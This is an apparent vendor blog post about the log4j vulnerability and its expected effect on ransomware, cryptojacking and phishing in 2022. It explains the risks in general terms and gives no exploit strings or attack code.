2021 was already shaping up as perhaps the worst year ever for cybercrime, but the recently discovered log4j vulnerability has delivered a grand finale. Analysts say the flaw in the open-source logging library for Java applications is a problem of catastrophic proportions that will impact cybersecurity efforts throughout the coming year — and beyond.
Applications use logs to maintain records of past activities, including errors and warnings, to give developers insight into the state of the app. For decades, programmers have used the open source log4j code instead of writing new logging code for every app. It is now used in billions of devices, including millions of web servers.
In early December, it was discovered that attackers can trick log4j into storing log entries that contain a string of malicious code. It can be as easy as typing a line of bad code into the public chat box of a multiplayer online video game or changing the device name of a smartphone to an exploit string. After that, a hacker can use the compromised device to launch a variety of attacks.
Here are three ways the log4j flaw will impact the cybersecurity landscape in the coming year:
Although it will be a few months before the final numbers are tabulated, 2021 was already a record year for ransomware. One security firm estimates that the volume of attacks will surpass 700 million, a 130 percent increase over 2020, with the average recovery costs rising to $1.85 million. Those numbers are likely to continue rising in 2022.
The log4j flaw makes it easier for attackers to gain full access to systems running the logging utility. With the ability to write malicious code directly into the logging library, attackers can bypass antivirus, antimalware and other standard defenses. Researchers expect attackers to use the flaw to establish backdoors into corporate networks that can later be sold to ransomware operators.
There was a steep rise in reported cryptojacking attacks in 2021, as malicious actors infiltrated networks to install malware that covertly uses system resources to mine cryptocurrencies such as Bitcoin. The process drains system resources and can stress CPUs and GPUs, potentially causing devices to fail prematurely. Cryptojacking also increases energy consumption and consumes network bandwidth.
Within days of the log4j flaw’s discovery on Dec. 9, security firms detected hundreds of thousands of attempts to remotely inject coin-miner malware on corporate networks. Worse yet, analysts say the cryptojacking software increasingly includes additional malicious payloads designed to exfiltrate data from compromised systems.
Phishing is a most reliable vehicle for delivering all manner of malware, and we’ll almost certainly see a rise in emails with links to log4j exploits. More worrisome, however, is the possibility that phishing emails may be able to deliver a log4j payload even if the end-user doesn’t click on an infected link or attachment.
Hackers might be able to simply type in a string of malicious code in the subject header of an email. During delivery, emails pass through multiple servers — many of which process email header information and write some of that into their logs. Hackers could potentially execute malicious code on any of those servers running log4j.
While the new vulnerability has rightfully roiled the security industry, a number of other threats will require your attention in the coming year. Supply chain attacks, remote access challenges, cloud misconfigurations, data exfiltration and more are on the rise as well. We’ll take a closer look at these and other threats along with emerging preventive measures next week in part two of our cybersecurity trends post.